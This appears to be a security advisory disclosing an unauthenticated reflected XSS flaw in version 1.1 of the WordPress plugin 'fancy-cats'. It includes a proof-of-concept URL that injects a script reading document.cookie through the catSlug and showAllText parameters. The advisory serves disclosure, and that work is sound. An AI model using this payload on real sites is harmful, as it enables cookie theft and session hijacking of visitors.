wp-plugin : fancy-cats

Plugin Details
Plugin Name: wp-plugin : fancy-cats
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=catSlug'><script>alert(document.cookie)</script>&catId=catId&showAllText=showAllText'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : catSlug, showAllText

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| This is an extended categories widget. When the user clicks on a category from the widget, rather than loading a page with all of the posts in that category, a space will expand within the widget, showing the titles of all posts in that category. There are several configurable settings, so that the widget will fit in with the look and feel of your blog. You can set: * A limit on the height of the expanded area, so that a scroll bar will show if you have lots of posts in a category * The indentation of the post items * The title text, the instructional text, and the 'show all' text The expanding/collapsing of category post lists is done via AJAX, so the entire page doesn't have to continuously reload to perform the operation. If there is an extra feature you would like added, or something that you don't like and want to be able to change yourself, contact me and I will see about adding it in the next version. ]